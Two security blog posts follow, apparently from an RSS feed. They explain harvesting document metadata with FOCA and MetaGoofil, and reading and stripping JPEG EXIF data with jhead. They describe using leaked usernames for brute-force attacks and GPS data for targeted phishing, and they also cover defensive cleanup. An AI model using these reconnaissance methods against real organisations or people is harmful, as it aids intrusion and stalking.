Mass metadata information gathering can be accomplished pretty easily using search engines and their caching features. In this article i will present the use of MetaGoofil & FOCA, two free metadata information gathering & analyzing tools. Using these kind of gathering & analysis tools an attacker can gather large amounts of crucial information about a possible target organization or individual. On the other side, an IT Security Administrator can use these tools in order to locate the metadata information leakage of the organization and prevent or reduce it to a safe level.

 

FOCA

FOCA (Fingerprinting an Organization with Collected Archives) is one of the most popular pen-testing tools for automated gather and extraction of file metadata information developed by Informatica64. FOCA supports all the common document extensions (doc, docx, ppt, pptx, pdf, xls, xlsx, ppsx, etc). FOCA runs on Windows OS and you can download a free version from here. There is also a commercial version available.

FOCA is a pretty powerful tool with a lot of different options, although in this article I want to show how someone would use its basic feature set to search a domain for documents containing metadata. In order to do this you will first need to download and install FOCA and create a new project from the File menu. This project will need to be centered on a particular target domain. Once the project is created FOCA will use a list of search engines to search the domain for particular file types known to contain usable metadata.

 

Here are some screenshots of FOCA in action under a Windows 7 machine.

 

 

MetaGoofil

Metagoofil is an information gathering tool, that can extract metadata out of public documents (pdf, doc, xls, ppt, odp, ods) that are available in targeted websites. It can download all the public documents published in the target website and create an html report page which includes all the extracted metadata. At the end of the report there are listed all the potential usernames and disclosed paths recorded in the gathered metadata information. Using the list of potential usernames, an attacker can prepare a bruteforce attack on running services (ftp, ssh, pop3, vpn etc) and using the disclosed PATHs can make guesses about the OS, network names, shared resources etc.

Metagoofil uses google search engine in order to find documents that are published in the target website. For example, site:example.com filetype:pdf. After locating the file URLs, it downloads the files in a local directory and extract the hidden metadata using the libextractor. Metagoofil is written in python and can be run in any OS that fulfills the libextractor dependency. Depending your OS, you must edit the running script and provide the correct path of the extract binary.

You can download metagoofil from the official site, although google has changed the format of searching queries and the 1.4b version needs some alterations. For more information take a look at the unofficial fix.

Let’s see Metagoofil in action under a linux OS.

 

 

It is pretty obvious that the metadata gathering & extraction is easily accomplished. Recognizing the high security risk of hidden metadata leakage, I began writing a series of articles about metadata information included in different file types. I recently published the first part about exif jpeg metadata and I will continue with details and tools for others too.

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/feed/ 3
Enumerating Metadata: Part1 jpeg files http://bechtsoudis.com/2011/04/30/enumerating-metadata-part1-jpeg-files/#utm_source=rss&utm_medium=rss&utm_campaign=enumerating-metadata-part1-jpeg-files http://bechtsoudis.com/2011/04/30/enumerating-metadata-part1-jpeg-files/#comments Sat, 30 Apr 2011 18:26:46 +0000 http://bechtsoudis.com/?p=315 During the information gathering and reconnaissance phases potential intruders spend a great deal of time learning everything they can about their targets before they launch an attack. The gathered information is often crucial in order to find a weakness in a system or network and users participating in them. Hackers can gather useful information by examining the Metadata (data about data) content of files that are used by the victim user, system or network. In a try to enumerate all the possible Metadata leakage cases, i will write a series of articles covering different filetypes & file groups. In the first part i examine the exif jpeg metadata and how to handle them.

When you take a picture with your cell phone, digital camera & other relative devices, there is a lot more information than just the picture that is stored in the file. Depending on the device you use the metadata information stored may include:

    • Time and date picture was taken
    • Camera make and model
    • Integral low-res Exif thumbnail
    • Shutter speed
    • Camera F-stop number
    • Flash used (yes/no)
    • Distance camera was focused at
    • Focal length and calculate 35 mm equivalent focal length
    • Image resolution
    • GPS info (if device is not configured properly)
    • IPTC header
    • XMP data

Spying users and hackers may take advantage of this kind of information in order to create a starting point for their malicious activities. For example using the GPS info and the type of camera you have, the attacker may create a targeted promotional malicious email in order to compromise your system. Or third persons can gather information about you (vacation places & time, place living etc) through the images you have published in social networks & blogs.

There exist a lot of tools that are capable of reading/altering & removing the jpeg metatada information. In this article i will use a cross-platform tool named jhead and run it under a linux environment.

Download jhead source code (or binary) from the official site and compile using the make file (ignore compiling if you download a binary). Now lets see an example output:

$jhead /tmp/IMG_0247.JPG
File name    : /tmp/IMG_0247.JPG
File size    : 866859 bytes
File date    : 2008:03:10 22:48:36
Camera make  : Canon
Camera model : Canon PowerShot A460
Date/Time    : 2008:03:10 16:53:09
Resolution   : 2048 x 1536
Flash used   : No (auto)
Focal length :  5.4mm  (35mm equivalent: 39mm)
CCD width    : 4.93mm
Exposure time: 0.013 s  (1/80)
Aperture     : f/2.8
ISO equiv.   : 80
Whitebalance : Auto
Metering Mode: pattern

You can see that metadata information can be gathered pretty easily. In the worst case scenario you may have a GPS location leakage as seen in the screenshots at the end of the post.

 

Now let’s see how can we prevent this kind of leakage by removing metadata information. In the simplest scenario we can remove all metadata information using jhead. This can be done with the purejpg argument:

$jhead -purejpg /tmp/IMG_0247.JPG

Resulting in:

$jhead /tmp/IMG_0247.JPG
File name    : /tmp/IMG_0247.JPG
File size    : 857529 bytes
File date    : 2011:04:30 20:58:25
Resolution   : 2048 x 1536

Jhead offers a lot more options in order make more advanced changes in jpeg headers, including comment insertion, date & time changes, thumbnail changes, copy exif header from other image and more. Type -h to see the available options or read the official documentation. Additionally jhead can operate on a directory too, making mass changes to all jpeg files in that directory.

 

And some execution screenshots:

 

To be continued…..

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/04/30/enumerating-metadata-part1-jpeg-files/feed/ 1